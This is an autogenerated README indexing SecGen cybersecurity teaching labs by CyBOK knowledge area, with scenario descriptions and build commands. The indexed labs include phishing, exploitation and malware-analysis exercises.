README-CyBOK-Scenarios-Indexed.md

File metadata and controls

3646 lines (2298 loc) · 233 KB

Lab Scenarios and CyBOK

The Cyber Security Body of Knowledge (CyBOK) is a body of knowledge that aims to encapsulate the various knowledge areas present within cyber security. Scenarios within SecGen now contain XML elements linking them to CyBOK knowledge areas and specific topics within those knowledge areas. Additionally, video lectures for scenarios are tagged with CyBOK associations.

This file is an autogenerated index and cross-reference of the 118 SecGen practical lab scenarios that have CyBOK metadata.

You can browse the list below by CyBOK Knowledge Area and Topic. The list of scenarios in the second half of this document also includes keywords (known as "indicative topics" in CyBOK terminology).

Topics and keywords in all lowercase are provided by NCSC for CyBOK mapping; keywords in ALL CAPS are taken from the CyBOK mapping reference; mixed-case keywords are ones that we have added.

Cyber Security Body of Knowledge (CyBOK) Issue 1.1 is Crown Copyright, The National Cyber Security Centre 2021, licensed under the Open Government Licence http://www.nationalarchives.gov.uk/doc/open-government-licence/.

Scenarios Indexed By CyBOK Knowledge Area (KA)

Human Factors (HF)
Adversarial Behaviours (AB)
Malware & Attack Technology (MAT)
Web & Mobile Security (WAM)
Applied Cryptography (AC)
Forensics (F)
Privacy & Online Rights (POR)
Network Security (NS)
Security Operations & Incident Management (SOIM)
Software Security (SS)
Authentication, Authorisation & Accountability (AAA)
Operating Systems & Virtualisation (OSV)
Cyber-Physical Systems Security (CPS)

Human Factors (HF)

HF Scenarios

cyber_security_landscape/3_phishing.xml

HF Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Human Error | cyber_security_landscape/3_phishing.xml |

Adversarial Behaviours (AB)

AB Scenarios

cyber_security_landscape/3_phishing.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
labtainers/grfics.xml

AB Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Attacks | cyber_security_landscape/3_phishing.xml |
| Models | introducing_attacks/4_dns_footprinting.xml |
| | introducing_attacks/5_scanning.xml |
| | introducing_attacks/6_exploitation.xml |
| | introducing_attacks/7_post-exploitation.xml |
| | labtainers/grfics.xml |

Malware & Attack Technology (MAT)

MAT Scenarios

cyber_security_landscape/3_phishing.xml
introducing_attacks/2_malware_msf_payloads.xml
introducing_attacks/3_vulnerabilities.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
introducing_attacks/8_vulnerability_analysis.xml
labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
labtainers/bufoverflow.xml
labtainers/formatstring.xml
labtainers/gdblesson.xml
labtainers/ida.xml
labtainers/metasploit.xml
labtainers/retlibc.xml
labtainers/snort.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/7_live_analysis.xml
response_and_investigation/8_dead_analysis.xml
software_and_malware_analysis/10_anti_sre.xml
software_and_malware_analysis/11_coconut.xml
software_and_malware_analysis/1_dynamic_and_static_analysis.xml
software_and_malware_analysis/2_intro_to_c.xml
software_and_malware_analysis/3_c_and_asm.xml
software_and_malware_analysis/4_asm.xml
software_and_malware_analysis/5_ghidra.xml
software_and_malware_analysis/6_ghidra_analysis.xml
software_and_malware_analysis/6_ghidra_with_live_malware_samples.xml
software_and_malware_analysis/7_dynamic.xml
software_and_malware_analysis/8_dynamic_continued.xml
software_and_malware_analysis/9_malware_behaviour.xml
software_security_exploitation/4_exploit_development.xml
software_security_exploitation/5_linux_stack_bof.xml
software_security_exploitation/6_linux_nx_bypass.xml
software_security_exploitation/7_linux_aslr_bypass.xml
software_security_exploitation/8_linux_bof_format.xml

MAT Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Attacks and exploitation | cyber_security_landscape/3_phishing.xml |
| | introducing_attacks/2_malware_msf_payloads.xml |
| | introducing_attacks/3_vulnerabilities.xml |
| | introducing_attacks/6_exploitation.xml |
| | introducing_attacks/7_post-exploitation.xml |
| | introducing_attacks/8_vulnerability_analysis.xml |
| | labtainers/bufoverflow.xml |
| | labtainers/formatstring.xml |
| | labtainers/metasploit.xml |
| | labtainers/retlibc.xml |
| | software_security_exploitation/4_exploit_development.xml |
| | software_security_exploitation/5_linux_stack_bof.xml |
| | software_security_exploitation/6_linux_nx_bypass.xml |
| | software_security_exploitation/7_linux_aslr_bypass.xml |
| | software_security_exploitation/8_linux_bof_format.xml |
| Malware Taxonomy | introducing_attacks/2_malware_msf_payloads.xml |
| | software_and_malware_analysis/11_coconut.xml |
| | software_and_malware_analysis/1_dynamic_and_static_analysis.xml |
| | software_and_malware_analysis/9_malware_behaviour.xml |
| Malware Analysis | introducing_attacks/2_malware_msf_payloads.xml |
| | labtainers/gdblesson.xml |
| | labtainers/ida.xml |
| | software_and_malware_analysis/10_anti_sre.xml |
| | software_and_malware_analysis/11_coconut.xml |
| | software_and_malware_analysis/1_dynamic_and_static_analysis.xml |
| | software_and_malware_analysis/3_c_and_asm.xml |
| | software_and_malware_analysis/4_asm.xml |
| | software_and_malware_analysis/5_ghidra.xml |
| | software_and_malware_analysis/6_ghidra_analysis.xml |
| | software_and_malware_analysis/6_ghidra_with_live_malware_samples.xml |
| | software_and_malware_analysis/7_dynamic.xml |
| | software_and_malware_analysis/8_dynamic_continued.xml |
| | software_and_malware_analysis/9_malware_behaviour.xml |
| Malicious Activities by Malware | introducing_attacks/4_dns_footprinting.xml |
| | introducing_attacks/5_scanning.xml |
| | introducing_attacks/6_exploitation.xml |
| | introducing_attacks/7_post-exploitation.xml |
| | labtainers/metasploit.xml |
| MALCODE/MALWARE | labtainers/acl-hackerbot-flags.xml |
| | labtainers/acl.xml |
| Malware Detection | labtainers/snort.xml |
| | response_and_investigation/4_ids.xml |
| | response_and_investigation/5_ids_rules.xml |
| | response_and_investigation/7_live_analysis.xml |
| | response_and_investigation/8_dead_analysis.xml |
| Technical Underpinning | software_and_malware_analysis/2_intro_to_c.xml |
| | software_and_malware_analysis/3_c_and_asm.xml |

Web & Mobile Security (WAM)

WAM Scenarios

cyber_security_landscape/3_phishing.xml
cyber_security_landscape/4_encoding_encryption.xml
labtainers/iptables-ics.xml
labtainers/iptables.xml
labtainers/iptables2.xml
labtainers/sql-inject.xml
labtainers/webtrack.xml
labtainers/xforge.xml
labtainers/xsite.xml
systems_security/7_containers.xml
web_security/1_intro_web_security.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

WAM Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Client-Side Vulnerabilities and Mitigations | cyber_security_landscape/3_phishing.xml |
| | web_security/2_sessions_and_cookies.xml |
| | web_security/3_xss.xml |
| | web_security/6_csrf.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| Fundamental Concepts and Approaches | cyber_security_landscape/4_encoding_encryption.xml |
| | labtainers/webtrack.xml |
| | systems_security/7_containers.xml |
| | web_security/1_intro_web_security.xml |
| | web_security/2_sessions_and_cookies.xml |
| | web_security/3_xss.xml |
| | web_security/4_sqli.xml |
| | web_security/5_sqli_advanced.xml |
| | web_security/6_csrf.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| FIREWALLS | labtainers/iptables-ics.xml |
| | labtainers/iptables.xml |
| | labtainers/iptables2.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| Server-Side Vulnerabilities and Mitigations | labtainers/sql-inject.xml |
| | labtainers/xforge.xml |
| | labtainers/xsite.xml |
| | web_security/1_intro_web_security.xml |
| | web_security/2_sessions_and_cookies.xml |
| | web_security/3_xss.xml |
| | web_security/4_sqli.xml |
| | web_security/5_sqli_advanced.xml |
| | web_security/6_csrf.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |

Applied Cryptography (AC)

AC Scenarios

cyber_security_landscape/4_encoding_encryption.xml
cyber_security_landscape/6_symmetric_enc_aes.xml
cyber_security_landscape/7_asymmetric_enc_rsa.xml
labtainers/macs-hash.xml
labtainers/onewayhash.xml
labtainers/pubkey.xml
labtainers/ssh-agent.xml
labtainers/sshlab.xml
labtainers/ssl.xml
labtainers/symkeylab.xml

AC Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Algorithms, Schemes and Protocols | cyber_security_landscape/4_encoding_encryption.xml |
| | cyber_security_landscape/6_symmetric_enc_aes.xml |
| | cyber_security_landscape/7_asymmetric_enc_rsa.xml |
| | labtainers/pubkey.xml |
| | labtainers/symkeylab.xml |
| Symmetric Cryptography | cyber_security_landscape/6_symmetric_enc_aes.xml |
| | labtainers/symkeylab.xml |
| Cryptographic Implementation | cyber_security_landscape/6_symmetric_enc_aes.xml |
| | cyber_security_landscape/7_asymmetric_enc_rsa.xml |
| Public-Key Cryptography | cyber_security_landscape/7_asymmetric_enc_rsa.xml |
| | labtainers/macs-hash.xml |
| | labtainers/onewayhash.xml |
| | labtainers/ssh-agent.xml |
| | labtainers/sshlab.xml |
| | labtainers/ssl.xml |
| Key Management | cyber_security_landscape/7_asymmetric_enc_rsa.xml |

Forensics (F)

F Scenarios

cyber_security_landscape/4_encoding_encryption.xml
forensics/trashed_evidence.xml
labtainers/file-deletion.xml
labtainers/file-integrity.xml
labtainers/macs-hash.xml
labtainers/onewayhash.xml
labtainers/packet-introspection.xml
labtainers/pass-crack.xml
labtainers/pcapanalysis.xml
labtainers/webtrack.xml
response_and_investigation/2_integrity_detection.xml
response_and_investigation/6_exfiltration_detection.xml
response_and_investigation/7_live_analysis.xml
response_and_investigation/8_dead_analysis.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

F Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Artifact Analysis | cyber_security_landscape/4_encoding_encryption.xml |
| | labtainers/macs-hash.xml |
| | labtainers/onewayhash.xml |
| | labtainers/pass-crack.xml |
| | response_and_investigation/2_integrity_detection.xml |
| | response_and_investigation/6_exfiltration_detection.xml |
| Operating System Analysis | forensics/trashed_evidence.xml |
| | labtainers/file-deletion.xml |
| | labtainers/file-integrity.xml |
| | response_and_investigation/8_dead_analysis.xml |
| Application Forensics | forensics/trashed_evidence.xml |
| Main Memory Forensics | labtainers/packet-introspection.xml |
| | labtainers/pcapanalysis.xml |
| | response_and_investigation/7_live_analysis.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| WEB | labtainers/webtrack.xml |

Privacy & Online Rights (POR)

POR Scenarios

forensics/trashed_evidence.xml

POR Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Privacy Technologies and Democratic Values | forensics/trashed_evidence.xml |

Network Security (NS)

NS Scenarios

introducing_attacks/1_intro_linux.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
labtainers/arp-spoof.xml
labtainers/denyhost.xml
labtainers/dmz-example.xml
labtainers/dmz-lab.xml
labtainers/grfics.xml
labtainers/iptables-ics.xml
labtainers/iptables.xml
labtainers/iptables2.xml
labtainers/local-dns.xml
labtainers/nix-commands.xml
labtainers/nmap-discovery.xml
labtainers/nmap-ssh.xml
labtainers/pcapanalysis.xml
labtainers/pubkey.xml
labtainers/radius.xml
labtainers/remote-dns.xml
labtainers/routing-basics.xml
labtainers/routing-basics2.xml
labtainers/snort.xml
labtainers/tcpip.xml
labtainers/telnetlab.xml
labtainers/vpnlab.xml
labtainers/vpnlab2.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/6_exfiltration_detection.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

NS Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Network Protocols and Vulnerability | introducing_attacks/1_intro_linux.xml |
| | labtainers/arp-spoof.xml |
| | labtainers/local-dns.xml |
| | labtainers/remote-dns.xml |
| | labtainers/tcpip.xml |
| PENETRATION TESTING | introducing_attacks/4_dns_footprinting.xml |
| | introducing_attacks/5_scanning.xml |
| | labtainers/nix-commands.xml |
| | labtainers/nmap-discovery.xml |
| | labtainers/nmap-ssh.xml |
| Network Defence Tools | labtainers/denyhost.xml |
| | labtainers/dmz-example.xml |
| | labtainers/dmz-lab.xml |
| | labtainers/grfics.xml |
| | labtainers/iptables-ics.xml |
| | labtainers/iptables.xml |
| | labtainers/iptables2.xml |
| | labtainers/snort.xml |
| | labtainers/vpnlab.xml |
| | labtainers/vpnlab2.xml |
| | response_and_investigation/4_ids.xml |
| | response_and_investigation/5_ids_rules.xml |
| | response_and_investigation/6_exfiltration_detection.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| Internet Architecture | labtainers/iptables-ics.xml |
| | labtainers/iptables.xml |
| | labtainers/iptables2.xml |
| | labtainers/pubkey.xml |
| | labtainers/radius.xml |
| | labtainers/routing-basics.xml |
| | labtainers/routing-basics2.xml |
| | labtainers/tcpip.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| OSI (OPEN SYSTEM INTERCONNECT) MODEL | labtainers/pcapanalysis.xml |
| REMOTE ACCESS | labtainers/telnetlab.xml |
| TCP/IP | labtainers/telnetlab.xml |

Security Operations & Incident Management (SOIM)

SOIM Scenarios

introducing_attacks/1_intro_linux.xml
introducing_attacks/2_malware_msf_payloads.xml
introducing_attacks/3_vulnerabilities.xml
introducing_attacks/4_dns_footprinting.xml
introducing_attacks/5_scanning.xml
introducing_attacks/6_exploitation.xml
introducing_attacks/7_post-exploitation.xml
introducing_attacks/8_vulnerability_analysis.xml
labtainers/arp-spoof.xml
labtainers/backups.xml
labtainers/backups2.xml
labtainers/capabilities.xml
labtainers/centos-log.xml
labtainers/centos-log2.xml
labtainers/denyhost.xml
labtainers/file-integrity.xml
labtainers/grassmarlin.xml
labtainers/ldap.xml
labtainers/metasploit.xml
labtainers/nmap-ssh.xml
labtainers/packet-introspection.xml
labtainers/pcapanalysis.xml
labtainers/snort.xml
labtainers/sys-log.xml
labtainers/wireshark-intro.xml
response_and_investigation/2_integrity_detection.xml
response_and_investigation/3_backups_and_recovery.xml
response_and_investigation/4_ids.xml
response_and_investigation/5_ids_rules.xml
response_and_investigation/6_exfiltration_detection.xml
response_and_investigation/9_siem.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

SOIM Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| PENETRATION TESTING | introducing_attacks/1_intro_linux.xml |
| | introducing_attacks/2_malware_msf_payloads.xml |
| | introducing_attacks/3_vulnerabilities.xml |
| | introducing_attacks/4_dns_footprinting.xml |
| | introducing_attacks/5_scanning.xml |
| | introducing_attacks/6_exploitation.xml |
| | introducing_attacks/7_post-exploitation.xml |
| | introducing_attacks/8_vulnerability_analysis.xml |
| | labtainers/metasploit.xml |
| Monitor: Data Sources | labtainers/arp-spoof.xml |
| | labtainers/capabilities.xml |
| | labtainers/centos-log.xml |
| | labtainers/centos-log2.xml |
| | labtainers/file-integrity.xml |
| | labtainers/grassmarlin.xml |
| | labtainers/ldap.xml |
| | labtainers/packet-introspection.xml |
| | labtainers/pcapanalysis.xml |
| | labtainers/snort.xml |
| | labtainers/sys-log.xml |
| | labtainers/wireshark-intro.xml |
| | response_and_investigation/2_integrity_detection.xml |
| | response_and_investigation/4_ids.xml |
| | response_and_investigation/5_ids_rules.xml |
| | response_and_investigation/6_exfiltration_detection.xml |
| | response_and_investigation/9_siem.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| Execute: Mitigation and Countermeasures | labtainers/backups.xml |
| | labtainers/backups2.xml |
| | labtainers/denyhost.xml |
| | labtainers/snort.xml |
| | response_and_investigation/3_backups_and_recovery.xml |
| | response_and_investigation/4_ids.xml |
| | response_and_investigation/9_siem.xml |
| INCIDENT RESPONSE | labtainers/backups.xml |
| | labtainers/backups2.xml |
| CM (CONFIGURATION MANAGEMENT) | labtainers/denyhost.xml |
| | labtainers/nmap-ssh.xml |
| Analyse: Analysis Methods | labtainers/snort.xml |
| | response_and_investigation/4_ids.xml |
| | response_and_investigation/5_ids_rules.xml |
| | response_and_investigation/6_exfiltration_detection.xml |
| | response_and_investigation/9_siem.xml |
| Fundamental Concepts | response_and_investigation/9_siem.xml |
| Plan: Security Information and Event Management | response_and_investigation/9_siem.xml |

Software Security (SS)

SS Scenarios

introducing_attacks/6_exploitation.xml
labtainers/bufoverflow.xml
labtainers/formatstring.xml
labtainers/pass-crack.xml
labtainers/retlibc.xml
labtainers/sql-inject.xml
labtainers/xforge.xml
labtainers/xsite.xml
software_security_exploitation/1_c_asm_iof.xml
software_security_exploitation/2_race_conditions_format_str.xml
software_security_exploitation/3_bug_hunting_and_fuzzing.xml
software_security_exploitation/4_exploit_development.xml
software_security_exploitation/5_linux_stack_bof.xml
software_security_exploitation/6_linux_nx_bypass.xml
software_security_exploitation/7_linux_aslr_bypass.xml
software_security_exploitation/8_linux_bof_format.xml
systems_security/8_apparmor.xml
web_security/1_intro_web_security.xml
web_security/2_sessions_and_cookies.xml
web_security/3_xss.xml
web_security/4_sqli.xml
web_security/5_sqli_advanced.xml
web_security/6_csrf.xml
web_security/7_additional_web.xml
web_security/websec_lab.xml

SS Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Categories of Vulnerabilities | introducing_attacks/6_exploitation.xml |
| | labtainers/bufoverflow.xml |
| | labtainers/formatstring.xml |
| | labtainers/retlibc.xml |
| | labtainers/sql-inject.xml |
| | software_security_exploitation/1_c_asm_iof.xml |
| | software_security_exploitation/2_race_conditions_format_str.xml |
| | software_security_exploitation/4_exploit_development.xml |
| | software_security_exploitation/5_linux_stack_bof.xml |
| | software_security_exploitation/6_linux_nx_bypass.xml |
| | software_security_exploitation/7_linux_aslr_bypass.xml |
| | software_security_exploitation/8_linux_bof_format.xml |
| | web_security/1_intro_web_security.xml |
| | web_security/2_sessions_and_cookies.xml |
| | web_security/3_xss.xml |
| | web_security/4_sqli.xml |
| | web_security/5_sqli_advanced.xml |
| | web_security/6_csrf.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| Mitigating Exploitation | labtainers/bufoverflow.xml |
| | labtainers/retlibc.xml |
| | software_security_exploitation/6_linux_nx_bypass.xml |
| | software_security_exploitation/7_linux_aslr_bypass.xml |
| | systems_security/8_apparmor.xml |
| Authentication | labtainers/pass-crack.xml |
| Prevention of Vulnerabilities | labtainers/sql-inject.xml |
| | labtainers/xforge.xml |
| | labtainers/xsite.xml |
| | software_security_exploitation/1_c_asm_iof.xml |
| | software_security_exploitation/2_race_conditions_format_str.xml |
| | web_security/3_xss.xml |
| | web_security/4_sqli.xml |
| | web_security/5_sqli_advanced.xml |
| | web_security/6_csrf.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |
| Detection of Vulnerabilities | software_security_exploitation/3_bug_hunting_and_fuzzing.xml |
| | web_security/1_intro_web_security.xml |
| | web_security/2_sessions_and_cookies.xml |
| | web_security/3_xss.xml |
| | web_security/4_sqli.xml |
| | web_security/5_sqli_advanced.xml |
| | web_security/6_csrf.xml |
| | web_security/7_additional_web.xml |
| | web_security/websec_lab.xml |

Authentication, Authorisation & Accountability (AAA)

AAA Scenarios

labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
labtainers/file-integrity.xml
labtainers/ldap.xml
labtainers/macs-hash.xml
labtainers/nix-commands.xml
labtainers/onewayhash.xml
labtainers/radius.xml
labtainers/setuid-env.xml
response_and_investigation/1_integrity_protection.xml
response_and_investigation/7_live_analysis.xml
response_and_investigation/8_dead_analysis.xml
systems_security/1_authentication.xml
systems_security/2_pam.xml
systems_security/4_access_controls.xml
systems_security/5_suid.xml
systems_security/6_facls.xml
systems_security/7_containers.xml
systems_security/8_apparmor.xml

AAA Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Authorisation | labtainers/acl-hackerbot-flags.xml |
| | labtainers/acl.xml |
| | labtainers/ldap.xml |
| | labtainers/nix-commands.xml |
| | labtainers/setuid-env.xml |
| | response_and_investigation/1_integrity_protection.xml |
| | systems_security/4_access_controls.xml |
| | systems_security/5_suid.xml |
| | systems_security/6_facls.xml |
| | systems_security/7_containers.xml |
| | systems_security/8_apparmor.xml |
| Authentication | labtainers/file-integrity.xml |
| | labtainers/ldap.xml |
| | labtainers/macs-hash.xml |
| | labtainers/onewayhash.xml |
| | labtainers/radius.xml |
| | systems_security/1_authentication.xml |
| | systems_security/2_pam.xml |
| Accountability | response_and_investigation/7_live_analysis.xml |
| | response_and_investigation/8_dead_analysis.xml |

Operating Systems & Virtualisation (OSV)

OSV Scenarios

labtainers/acl-hackerbot-flags.xml
labtainers/acl.xml
labtainers/capabilities.xml
labtainers/setuid-env.xml
response_and_investigation/1_integrity_protection.xml
response_and_investigation/2_integrity_detection.xml
response_and_investigation/7_live_analysis.xml
systems_security/1_authentication.xml
systems_security/2_pam.xml
systems_security/4_access_controls.xml
systems_security/5_suid.xml
systems_security/6_facls.xml
systems_security/7_containers.xml
systems_security/8_apparmor.xml

OSV Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Primitives for Isolation and Mediation | labtainers/acl-hackerbot-flags.xml |
| | labtainers/acl.xml |
| | labtainers/capabilities.xml |
| | labtainers/setuid-env.xml |
| | response_and_investigation/1_integrity_protection.xml |
| | systems_security/1_authentication.xml |
| | systems_security/2_pam.xml |
| | systems_security/4_access_controls.xml |
| | systems_security/5_suid.xml |
| | systems_security/6_facls.xml |
| | systems_security/7_containers.xml |
| | systems_security/8_apparmor.xml |
| Role of Operating Systems | labtainers/acl-hackerbot-flags.xml |
| | labtainers/acl.xml |
| | systems_security/4_access_controls.xml |
| | systems_security/7_containers.xml |
| OS Hardening | response_and_investigation/2_integrity_detection.xml |
| | response_and_investigation/7_live_analysis.xml |

Cyber-Physical Systems Security (CPS)

CPS Scenarios

labtainers/grassmarlin.xml
labtainers/grfics.xml
labtainers/iptables-ics.xml
labtainers/plc-app.xml
labtainers/plc-forensics-adv.xml
labtainers/plc-forensics.xml
labtainers/plc.xml
labtainers/softplc.xml
labtainers/softplc2.xml
labtainers/ssl.xml

CPS Scenarios by Topics

| Topic | Scenario |
| --- | --- |
| Cyber-Physical Systems | labtainers/grassmarlin.xml |
| | labtainers/grfics.xml |
| | labtainers/iptables-ics.xml |
| | labtainers/plc-app.xml |
| | labtainers/plc-forensics-adv.xml |
| | labtainers/plc-forensics.xml |
| | labtainers/plc.xml |
| | labtainers/softplc.xml |
| | labtainers/softplc2.xml |
| | labtainers/ssl.xml |
| Cyber-Physical Systems Domains | labtainers/grassmarlin.xml |
| | labtainers/grfics.xml |
| | labtainers/iptables-ics.xml |
| | labtainers/plc-app.xml |
| | labtainers/plc-forensics-adv.xml |
| | labtainers/plc-forensics.xml |
| | labtainers/plc.xml |
| | labtainers/softplc.xml |
| | labtainers/softplc2.xml |
| | labtainers/ssl.xml |

Scenario CyBOK Keywords

cyber_security_landscape/3_phishing.xml


| Key | Data |
| --- | --- |
| Name | Let's Go Phishing |
| Description | Introduction<br>Humans play a crucial role in the cyber security of systems and information. Many attacks target users and their mental models of cyber security systems and risk. For example, if an attacker can trick a user into performing tasks for them, the attacker can achieve their goals and gain access that they are not authorised to. Human behavior often serves as both the first line of defense and the weakest link. This lab delves into the critical role humans play in safeguarding systems and information. It highlights the fact that even the most robust technical defenses can be compromised due to human error and deception. This lab primarily focuses on a pervasive cyber threat - phishing attacks. Phishing, an artful manipulation of human psychology, lures individuals into compromising security by tricking them into revealing sensitive information, clicking malicious links, or installing malware. Through this hands-on exercise, you will gain insights into how attackers exploit human vulnerabilities, learn the tactics used to craft convincing phishing emails, and explore techniques to create malicious attachments that can compromise a user's system.<br><br>In this lab, you will embark on a simulated cybersecurity mission within a fictitious organization. Your objective is to browse the organization's website to gather information on employees, email addresses, and their potential interests. You will then employ the tactics of engagement by sending targeted phishing emails to these individuals, using techniques such as spoofing emails, creating malicious attachments (executable programs, LibreOffice documents with macros), and more. As your victims respond to your emails, they will reveal why they trust or distrust your messages, providing invaluable feedback. The ultimate goal is to persuade these users to open the malicious attachments, granting you remote access to their systems. Your mission culminates in accessing the coveted "flag" files hidden in each victim's home directory, which you will submit as proof of your success. This lab offers a unique opportunity to understand how cybersecurity threats exploit human psychology, providing a practical foundation to enhance cyber awareness and strengthen defenses against these deceptive tactics. |
| Lab sheet | https://docs.google.com/document/d/1Yb28GYRLD0Ihnb5oeFp-TGurhb8BZfm_qFbSSrGEknI/edit?usp=sharing |
| Type | ctf-lab; lab-sheet |
| Author | Z. Cliffe Schreuders |
| VM names | victim_server; kali |

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Human Factors (HF) | Human Error | latent usability failures in systems-of-systems |
| Adversarial Behaviours (AB) | Attacks | SOCIAL ENGINEERING; MALICIOUS ACTIVITIES BY MALICIOUS ATTACHMENTS |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION FRAMEWORKS; MALCODE/MALWARE - SOCIAL ENGINEERING - BAITING; MALCODE/MALWARE - SOCIAL ENGINEERING - PRETEXTING; MALCODE/MALWARE - VIRUSES - COUNTERMEASURES; MALCODE/MALWARE - VIRUSES - MACRO VIRUSES; MALCODE/MALWARE - SPAM; MALCODE/MALWARE - SPOOFING |
| Web & Mobile Security (WAM) | Client-Side Vulnerabilities and Mitigations | E-MAIL - PHISHING; E-MAIL - SPOOFING |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/cyber_security_landscape/3_phishing.xml run
```


cyber_security_landscape/4_encoding_encryption.xml


| Key | Data |
| --- | --- |
| Name | Encoding and Encryption Lab |
| Description | Introduction<br>Cryptography is a fundamental aspect of information security, enabling us to secure data from prying eyes and malicious actors. This hands-on lab will equip you with essential knowledge and skills related to encoding schemes, hash algorithms, and the use of tools like OpenSSL and Gnu Privacy Guard (GPG). You'll explore concepts like encoding data into different formats, encrypting and decrypting information, and managing keys. These skills are crucial for anyone interested in the field of cybersecurity, data protection, or simply understanding how secure communication works in the digital age.<br><br>Throughout the lab, you'll learn to encode strings into various formats, including hexadecimal and Base64. You'll experiment with symmetric key encryption using the Data Encryption Standard (DES) and the Advanced Encryption Standard (AES). Additionally, you'll explore public-key cryptography with GPG, creating and managing keys, encrypting and decrypting data, and understanding the importance of key pairs.<br><br>In the home directory of your VM there are a series of encoding and encryption CTF challenges for you to complete, to put your knowledge into practice. |
| Lab sheet | https://docs.google.com/document/d/1wKm2c7yxhM-9GnAiS_Mgvk_8-H7FKEBeGeMc6H0KlwA/edit?usp=sharing |
| Type | ctf-lab; hackerbot-lab; lab-sheet |
| Author | Z. Cliffe Schreuders |
| VM names | desktop |

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Applied Cryptography (AC) | Algorithms, Schemes and Protocols | Encoding vs Cryptography; Caesar cipher; Vigenere cipher; SYMMETRIC CRYPTOGRAPHY - AES (ADVANCED ENCRYPTION STANDARD) |
| Forensics (F) | Artifact Analysis | Encoding and alternative data formats |
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | ENCODING; BASE64 |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/cyber_security_landscape/4_encoding_encryption.xml run
```


cyber_security_landscape/6_symmetric_enc_aes.xml


| Key | Data |
| --- | --- |
| Name | Symmetric Encryption with AES |
| Description | Symmetric encryption involves using the same key for both the encryption and decryption of data. In this lab, you will explore symmetric encryption with a focus on the Advanced Encryption Standard (AES). AES is a widely used block cipher that plays a crucial role in securing data in various applications, from secure communications to data protection. This lab aims to provide you with a high-level understanding of AES and its fundamental operations, such as Substitution (SubBytes), Permutation (ShiftRows and MixColumns), and Key Addition (Round Key). You will also explore how to work with AES encryption and decryption using both the GPG tool and Python3 with the Cryptodome module. This practical hands-on experience will equip you with the knowledge and skills necessary to apply AES encryption to secure your data.<br><br>Throughout this lab, you will have the opportunity to complete a series of tasks and challenges. These practical exercises will not only help you understand the underlying principles of AES but also equip you with the skills to apply this encryption technique to real-world scenarios, ensuring the security and confidentiality of your data.<br><br>This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot. |
| Type | ctf-lab; hackerbot-lab; lab-sheet |
| Author | Z. Cliffe Schreuders |
| VM names | desktop; hb_server |

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Applied Cryptography (AC) | Algorithms, Schemes and Protocols | ADVANCED ENCRYPTION STANDARD (AES); ECB (ELECTRONIC CODE BOOK) BLOCK CIPHER MODE |
| Applied Cryptography (AC) | Symmetric Cryptography | symmetric primitives; symmetric encryption and authentication |
| Applied Cryptography (AC) | Cryptographic Implementation | Cryptographic Libraries; ENCRYPTION - TOOLS |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/cyber_security_landscape/6_symmetric_enc_aes.xml run
```


cyber_security_landscape/7_asymmetric_enc_rsa.xml


| Key | Data |
| --- | --- |
| Name | Asymmetric Encryption with RSA |
| Description | Public key cryptography (also known as asymmetric encryption) enables secure communication, digital signatures, and data encryption without the need for a shared secret key. In this lab you will delve into the world of public key cryptography, specifically focusing on the RSA (Rivest-Shamir-Adleman) cipher, one of the most widely used asymmetric encryption methods. This lab will help you understand the fundamental principles of RSA encryption, key pair generation, and encryption/decryption processes. You will also interact with Hackerbot, a chatbot designed to challenge and test your knowledge as you progress through the exercises.<br><br>Throughout this lab, you will learn the key concepts and procedures related to RSA encryption. You will start by generating RSA key pairs and performing encryption and decryption operations using both OpenSSL and Python. You will pick prime numbers, calculate modulus and phi(N), select encryption and decryption keys, and apply these concepts to encrypt and decrypt messages. The lab includes various Hackerbot challenges that you will complete, such as creating 